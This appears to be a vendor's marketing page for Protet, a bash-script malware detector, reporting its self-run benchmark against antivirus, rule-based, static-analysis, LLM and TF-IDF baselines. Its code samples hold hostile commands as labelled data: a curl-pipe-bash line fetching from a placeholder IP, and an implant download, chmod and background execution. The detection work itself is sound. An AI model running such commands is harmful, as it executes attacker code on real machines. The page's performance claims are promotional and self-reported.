Protet Detection Benchmark
Bash Script Malware Detection — Independent Evaluation
90% detection rate at 0.1% false positive rate. Where every other tool fails, Protet detects.
Protet achieves 90% true positive rate at a 0.1% false positive rate on bash script malware detection — outperforming every compared approach by a wide margin. On the hardest category of attacks (sparse malicious payloads hidden in legitimate-looking scripts), Protet maintains 85% detection while rule-based tools score 0% and the best classical ML baseline drops to 40%.
Detection rates at fixed false-positive rates
Eight detectors across five baseline categories — signature-based AV, rule-based tools, static analysis, classical ML, and a state-of-the-art LLM — plus Protet itself, evaluated on an identical held-out test set of 200 samples. Primary operating point: FPR = 0.1% (1 false alert per 1,000 benign scripts).
| Detector | Partition | n | TPR @ 0.1% FPR ★ | TPR @ 1% FPR | TPR @ 5% FPR | Verdict |
|---|---|---|---|---|---|---|
| ClamAV (signature-based AV) | all | 200 | 7% | 7% | 7% | Ineffective |
| | sparse | 120 | 0% | 0% | 0% | |
| YARA (rule-based pattern matching) | all | 200 | 0% | 0% | 0% | Ineffective |
| | sparse | 120 | 0% | 0% | 0% | |
| ShellCheck (static analysis linter) | all | 200 | 0% | 0% | 5% | Ineffective |
| | sparse | 120 | 0% | 0% | 10% | |
| Semgrep p/bash (static analysis / SAST) | all | 200 | 0% | 0% | 0% | Ineffective |
| | sparse | 120 | 0% | 0% | 0% | |
| Claude Sonnet 4.6 (LLM, zero-shot) | all | 200 | 2% | 2% | 2% | Ineffective |
| | sparse | 120 | 0% | 0% | 0% | |
| TF-IDF + Random Forest (classical ML) | all | 200 | 36% | 43% | 69% | Moderate |
| | sparse | 120 | 20% | 20% | 65% | |
| TF-IDF + Logistic Regression (classical ML, best non-Protet) | all | 200 | 54% | 68% | 80% | Moderate |
| | sparse | 120 | 20% | 40% | 65% | |
| Protet (purpose-built detector) | all | 200 | 90% | 90% | 90% | Best-in-class |
| | sparse | 120 | 85% | 85% | 85% | |
★ Primary operating point. TPR = fraction of malicious samples correctly flagged. FPR = fraction of benign samples incorrectly flagged. Each FPR column is an independent threshold — chosen per detector to hit exactly that FPR on the benign subset. Protet's identical scores across all three FPR thresholds indicate bimodal, highly confident decisions.
The margin over every alternative
90% vs 54% against the best non-Protet detector (TF-IDF + Logistic Regression) at the primary operating point — a +67% relative improvement in detection rate.
85% vs 20% on sparse attacks — a +325% relative improvement in the hardest scenario.
A state-of-the-art LLM with an expert prompt is not a viable substitute for a purpose-trained detector.
These are the attacks this benchmark is designed around
The sparse_window partition — the hardest test category — directly models the attack structure of three major real-world incidents. In each case, the malicious payload was a tiny fraction of an otherwise legitimate script. Signature-based tools scored 0%. Protet scores 85%.
Codecov (2021) · CISA Advisory
One curl line injected into a 400-line legitimate CI uploader script. Ran silently for two months across CI pipelines at Twilio, HashiCorp, Confluent, and the U.S. DHS. Payload density: ~0.25%. This is the defining sparse payload attack. ClamAV, YARA, and Semgrep score 0% on this structure. Protet detects the sequence.
tj-actions/changed-files (March 2025)
Malicious shell code injected into a GitHub Actions step used by 23,000 repositories. Dumped CI runner memory including secrets to workflow logs. One malicious step in an otherwise normal pipeline. The payload was the only anomalous element — invisible to tools that look at individual commands in isolation.
XZ Utils (March 2024 · CVE-2024-3094)
Backdoor hidden in Autoconf and bash build scripts for two years. Nearly reached every glibc Linux system globally. Caught accidentally by a human noticing SSH slowness — not by any security tool. Zero signatures existed. Zero rules fired. The malicious behaviour was distributed across seemingly innocent build steps.
Why sparse payloads are the hardest problem
Modern supply chain and infrastructure attacks increasingly rely on malicious code injected into otherwise legitimate shell scripts. A single malicious command — a reverse shell, a credential exfiltration call, a persistence hook — can be buried among dozens of benign commands, making detection extremely difficult for tools that look for known signatures or obvious patterns.
Attack types in the dataset
- Data exfiltration (credentials, SSH keys, environment variables)
- Reverse shells and command-and-control callbacks
- Persistence mechanisms (cron jobs, systemd hooks, bashrc injection)
- Supply chain implants injected into CI/CD pipeline scripts
- Obfuscated payload execution (base64 decode + eval, curl-pipe-bash)
Sparsity distribution — malicious samples
Malicious command fraction per window (n=100 malicious samples):
Window size: ~40 top-level commands. Sparse window threshold: <5% (<2 malicious commands).
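The sparse-window criterion above can be sketched in a few lines. This is a minimal illustration only — the function names and the single-payload example window are assumptions for the sketch, not Protet's actual implementation:

```python
def malicious_fraction(commands, labels):
    """Fraction of top-level commands in one window that are malicious.

    `commands` is a list of top-level command strings for a ~40-command
    window; `labels` is a parallel list of bool ground-truth labels.
    """
    if not commands:
        return 0.0
    return sum(labels) / len(commands)


def is_sparse_window(commands, labels, threshold=0.05):
    """A window is 'sparse' when under 5% of its commands are malicious,
    i.e. fewer than 2 malicious commands in a ~40-command window."""
    return malicious_fraction(commands, labels) < threshold


# A 40-command window with a single injected payload line: 1/40 = 2.5% density,
# matching the Codecov-style attack structure described above.
window = ["./configure"] * 39 + ["curl -s http://203.0.113.7/up | bash"]
labels = [False] * 39 + [True]
```

At 2.5% density the window falls well under the 5% sparse threshold, so a tool must flag it on the strength of a single command out of forty.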
What this benchmark proves
- Rule-based tools are structurally blind to novel malware. ClamAV, YARA, Semgrep, and ShellCheck score 0–7% — they require prior knowledge of the exact malware signature. Novel or lightly modified payloads evade detection entirely.
- Classical ML degrades under sparsity. TF-IDF+LR reaches 68% overall but drops to 40% on sparse attacks — a –28pp gap. When the malicious signal is diluted by surrounding benign commands, token frequency loses its discriminative power.
- Claude Sonnet 4.6 scores 2% overall and 0% on sparse attacks. General intelligence does not substitute for task-specific training. The prompt explicitly warned about sparse payloads — this is not a prompt engineering failure, it is a fundamental limitation of zero-shot classification on this distribution.
- Protet achieves 90% TPR@0.1% FPR overall and 85% on sparse attacks. A +65pp lead over the best alternative on the hardest partition. Sparsity is not a weakness — Protet was trained specifically to detect malicious intent within mixed-content windows regardless of surrounding benign noise.
- Protet's decisions are highly confident. Identical scores at 0.1%, 1%, and 5% FPR indicate a bimodal score distribution — Protet is rarely ambiguous, minimising alert noise for SOC teams operating at any threshold.
Detection rate is one number. The attack chain is the other.
A 90% detection rate means Protet catches 9 in 10 attacks. When it fires, it also returns the exact commands that form the attack chain — extracted from the surrounding legitimate activity — so your analyst knows what to investigate before opening a terminal.
Example: Deployment hijack (Scenario 6)
The analyst gets evidence, not just an alert
In this scenario, 16 of 19 commands are legitimate deployment operations. Protet surfaces the three commands that form the attack chain — the implant download, the chmod, and the background execution — while ignoring the surrounding noise.
Attach to tickets directly
The /explain endpoint returns structured JSON. The flagged command list is machine-readable and suitable for attaching to PagerDuty incidents, Jira tickets, or Slack alerts — giving on-call engineers immediate context without requiring shell access to the affected pod.
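A sketch of consuming such a response and collapsing it into a one-line ticket summary. The JSON field names here (`verdict`, `score`, `flagged_commands`) and the helper are illustrative assumptions, not Protet's documented schema:

```python
import json

# Hypothetical /explain response for the deployment-hijack scenario above --
# field names and values are assumptions for illustration only.
raw = '''{
  "verdict": "malicious",
  "score": 0.97,
  "flagged_commands": [
    {"index": 11, "command": "curl -s http://203.0.113.7/agent -o /tmp/.agent"},
    {"index": 12, "command": "chmod +x /tmp/.agent"},
    {"index": 13, "command": "nohup /tmp/.agent &"}
  ]
}'''


def summarise_for_ticket(payload: str) -> str:
    """Collapse a structured /explain response into one line for an alert."""
    data = json.loads(payload)
    cmds = [c["command"] for c in data["flagged_commands"]]
    return f"{data['verdict']} (score {data['score']}): " + " && ".join(cmds)
```

Because the response is plain JSON, the same payload can be attached unmodified to a PagerDuty incident or posted to a Slack webhook.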
The live demo exposes the /explain endpoint directly: select any scenario, run the analysis, and see the actual flagged commands returned by the API.
How the benchmark was run
All eight detectors were evaluated on an identical held-out test set. No detector had access to test data during training or rule development.
Setup
Dataset
Real-world bash scripts from public repositories and known malware corpora. Test set: 200 samples (100 malicious, 100 benign).
Train/test split at the original script level — no script appears in more than one split. TF-IDF baselines were trained on the same training partition as Protet.
Metric: TPR @ Fixed FPR
Rather than a single accuracy number, the benchmark uses TPR at fixed FPR operating points: 0.1%, 1.0%, and 5.0%.
For each detector, the ROC curve is computed and TPR is read at the threshold that produces exactly the target FPR on the benign subset. FPR=0.1% is the primary reporting point — 1 false alert per 1,000 benign scripts.
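A minimal pure-Python sketch of this metric. It is simplified relative to a full ROC sweep: it picks the highest threshold whose FPR does not exceed the target rather than interpolating the curve to hit it exactly:

```python
def tpr_at_fpr(benign_scores, malicious_scores, target_fpr):
    """TPR at the strictest threshold whose FPR stays at or below target_fpr.

    Scores follow the 'higher = more malicious' convention. The threshold is
    chosen from the benign score distribution so that at most target_fpr of
    benign samples are flagged.
    """
    benign = sorted(benign_scores, reverse=True)
    # Number of false positives we are allowed to spend at this FPR.
    allowed_fp = min(int(target_fpr * len(benign)), len(benign) - 1)
    # Flag anything strictly above the (allowed_fp + 1)-th highest benign score.
    threshold = benign[allowed_fp]
    tp = sum(1 for s in malicious_scores if s > threshold)
    return tp / len(malicious_scores)


# A bimodal detector: near-certain on 85 attacks, near-zero on the rest.
benign = [0.1] * 99 + [0.9]
malicious = [0.95] * 85 + [0.05] * 15
```

Note that for this bimodal score distribution the result is identical at FPR 0.1% and 1% — the same effect the table shows for Protet across all three thresholds.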
Detectors
ClamAV & YARA
ClamAV: signatures updated with freshclam before the run. Score = binary (exit code). TPR is identical at all FPR thresholds — no probability score to sweep.
YARA: two community repositories (Neo23x0/signature-base, reversinglabs-yara-rules). Score = fraction of rule files matching. Zero detections across all thresholds.
Static Analysis — ShellCheck & Semgrep
ShellCheck: issue count per script. Semgrep: number of p/bash rule matches. Both target code quality and known vulnerability patterns — not the behavioural signatures of active malware.
Malicious code is frequently syntactically valid and follows correct bash conventions, making these tools structurally unable to detect attacker intent.
TF-IDF Baselines — LR & RF
Trained on the same split as Protet. Hyperparameters tuned for bash code: non-whitespace tokenization, bigrams, sublinear TF scaling, 100k feature vocabulary.
Token frequency is a useful signal when malicious density is high — specific commands and flag combinations correlate with intent. Performance degrades sharply on sparse windows where the signal is diluted by surrounding benign content.
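A sketch of this baseline configuration in scikit-learn. Only the vectoriser options are taken from the description above (non-whitespace tokenisation, bigrams, sublinear TF, 100k vocabulary); the classifier settings are assumptions, not the benchmark's tuned values:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

baseline = make_pipeline(
    TfidfVectorizer(
        token_pattern=r"\S+",   # split on whitespace only: keeps flags like '-rf'
        ngram_range=(1, 2),     # unigrams + bigrams
        sublinear_tf=True,      # 1 + log(tf) scaling
        max_features=100_000,   # 100k-feature vocabulary
    ),
    LogisticRegression(max_iter=1000),  # assumed settings, not the tuned ones
)
```

The whitespace-only token pattern matters for bash: default word tokenisation would discard the punctuation-heavy flags and redirections that carry much of the signal.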
Protet
Production model loaded from MLflow Model Registry via the champion alias. A sequence-aware classifier fine-tuned on real-world attack chains, trained specifically to detect malicious intent within mixed-content windows.
Input: pre-computed embedding vectors per script window. Output: positive-class probability score for continuous ROC sweep.
LLM Evaluation
Claude Sonnet 4.6
Zero-shot classification at temperature=0 with a security-specialist system prompt. Score = confidence if malicious=true, else 1−confidence, enabling a continuous ROC sweep.
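The verdict-to-score mapping described above, written out (the function name is ours; the rule itself is as stated):

```python
def llm_score(malicious: bool, confidence: float) -> float:
    """Map a {malicious, confidence} verdict onto a single [0, 1] score,
    where higher means more likely malicious, enabling an ROC sweep."""
    return confidence if malicious else 1.0 - confidence
```

A confident benign verdict thus maps near 0 and a confident malicious verdict near 1, so the threshold can be swept continuously like any probabilistic classifier's output.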
The prompt was deliberately maximalist — explicitly instructing the model to look for sparse payloads and treat any single malicious command as sufficient for a positive verdict. Results represent best-case zero-shot performance, not a prompt engineering failure.
System prompt (verbatim)
Notes
- All detectors were evaluated on the same held-out test set, never seen during any part of Protet training.
- Train/test split was performed at the original script level to prevent data leakage.
- TF-IDF baselines were trained on the same training partition as Protet for a fair comparison.
- FPR is computed over benign scripts only; TPR over malicious scripts only.
- The sparse_window partition contains all 100 benign samples and approximately 20 malicious samples with <5% malicious command density.
- ClamAV signatures were refreshed immediately before evaluation. YARA rules sourced from Neo23x0/signature-base and reversinglabs-yara-rules.
- Claude Sonnet 4.6 evaluated at temperature=0 with a security-specialist system prompt explicitly designed to maximise detection sensitivity on sparse payloads.
Add Protet to your detection stack
Free SaaS API. No infrastructure changes required. 90% detection where every other tool fails.